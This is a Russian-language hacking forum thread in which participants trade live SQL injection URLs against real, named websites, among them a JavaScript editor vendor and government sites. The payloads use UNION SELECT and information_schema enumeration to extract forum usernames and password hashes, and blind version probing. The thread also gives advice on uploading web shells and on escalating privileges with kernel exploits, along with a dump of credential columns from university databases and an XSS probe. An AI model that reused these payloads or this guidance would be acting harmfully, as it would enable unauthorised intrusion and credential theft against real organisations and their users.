А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем той таблицы, ты данных не получишь
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,database(),8/**/ Название бд tinymce!
Так вроде бы все хорошо но... Хочется достать логин и пасс форума Вот делаю запрос Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+moxieforge.punbb_users+limit+1,1/* не проходит Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce.punbb_users+limit+1,1/* Не проходит делаю запрос другой Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/* не проходит Вопрос. Где же может валятся таблица с юзверями форума?
Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat(table_name,0x3a,table_schema),8+from+information_schema.tables/* punbb_users:tinymce_punbb
Почему не работает??? http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,user_password),8+from+tinymce.tinymce_punbb/**/
Вот так наверное: Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce_punbb.punbb_users punbb_users - таблица с пользователями tinymce_punbb - БД в которой лежит эта таблица
имеется сайт с sql injection. если у пользователся нет file_priv и адрес админки невозможно найти, то вообще бесполезно что-то пытаться сделать? к примеру хотел залишь шелл, но ведь нет прав на файлы у юзверя тоесть load_file() into dumpfile отказываются работать у юзера есть права только на одну базу данных. к mysql.user доступа не имеет
dArKkNiGHt, https://forum.antichat.ru/threadnav34338-1-10.html Вот это попробуй. И поищи какой-нить форум, или гестбуку или хоть что-то, за что можно зацепица. И попробуй погуглить админку
Я не говорил,что лоад фаил должен исполнять пхп код(нафига?).Я просто не понял,какой ты именно инклуд имел(я знаю только PHP include bug),и параллельно задал вопрос про лоад фаил.При запросе file_priv выводит Y,то бишь есть,а файлы не читаются(ни один) с помощью лоад файла,вот и всё.А спросил потому,что встретился с таким только пару раз.
Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там
Народ,интересуют ВСЕ возможные способы поднятия прав на шелле (кроме убийства админа или насылки на него порчи/сглаза/привода гипнотизёра и прочих мелких шалостей).Особенно интересные.Версия ядра Linux 2.6.15-51-server .Шеллом практически пользовался в *праздничное* время,следовательно,опыт имею минимальный.(Второй шелл заливаю,чего же вы хотели))) ).Выслушаю все ваши предложения,идеи и пожелания.А также ссылки. ЗЫ: Забыл уточнить - шелл С99 2.0 .Вроде где-то валялась 2.4 в нэте,но это другая тема разговора
Я бы и рад дать сайтег,но он не содержания аля пиво.ру ((.Придётся,видимо,разбираться самому(((.Всё равно спасибо
Велемир, юзай сплойт под это ядро. Оно довольно старое. Можешь опять же списаца со мной в асе - помогу. Или юзай milw0rm.com и packetstormsecurity.net з.ы. какой веб-шелл - значения не имеет. В любом случае для поднятия прав нужно ssh
ok guys im sorry for bad russians but i need help pls course_enroll>course_enroll_pass>elearn dept_member>PASS>elearn members>PASS>elearn users>Password>elearn course_enroll>course_enroll_pass>fopme dept_member>PASS>fopme members>PASS>fopme users>Password>fopme mdl_course>password>mis mdl_course_request>password>mis mdl_hotpot>password>mis mdl_lesson>usepassword>mis mdl_lesson>password>mis mdl_lesson_default>usepassword>mis mdl_lesson_default>password>mis mdl_quiz>password>mis mdl_user>password>mis mdl_workshop>usepassword>mis mdl_workshop>password>mis course_enroll>course_enroll_pass>pharmacy dept_member>PASS>pharmacy faculty_users>Pass>pharmacy members>PASS>pharmacy users>Password>pharmacy members>PASS>qaumed members>PASS>qaumed_evaluation faculty>password>scuws faculty_copy>password>scuws members>PASS>scuws users>Password>scuws mdl_course>password>test mdl_course_request>password>test mdl_exercise>usepassword>test mdl_exercise>password>test mdl_groups>password>test mdl_hotpot>password>test mdl_lesson>usepassword>test mdl_lesson>password>test mdl_lesson_default>usepassword>test mdl_lesson_default>password>test mdl_quiz>password>test mdl_user>password>test mdl_workshop>usepassword>test mdl_workshop>password>test membersxx>PASS>test members>PASS>test i got this info but i need to get table to search what to use???????????????????????? waitting>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Как это можно использовать http://allsexcontact.ru:80/pages.php?id=<script>alert(39740,1099853472)</script>
AHMED HASSAN wtf? make sure u can write atleast some lang. that is understandable and try to explain exactly what u need! what table? u mean to search? anyway if ur technological skillz are not enough developed to understand this, please read more of manual ) Nofear например так Велемир metasploit? а вот мои непохеки: 10к в сутки..)
sabe -------------------- Именно сдесь скули нет: http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full А вообще там с фильтрацией проблемы можно поискать другой параметр. База Access -------------------- Это 3 ветка сравни http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version(),1,1)=3/* и http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version(),1,1)=3/* Видишь "About us" справа там где ошибка появлялась Или вот сдесь более наглядно: http://www.nfvcb.gov.ng/home_innerpages.php?pageid=39+and+substring(version(),1,1)=3&pagesectionid=7 ---------------------- Это не скуль http://www.wildberries.ru/news/detail.aspx?ID=69%27 ---------------------- Последняя: Портал работает на "Битрикс" можешь при желании поискать баги под неё
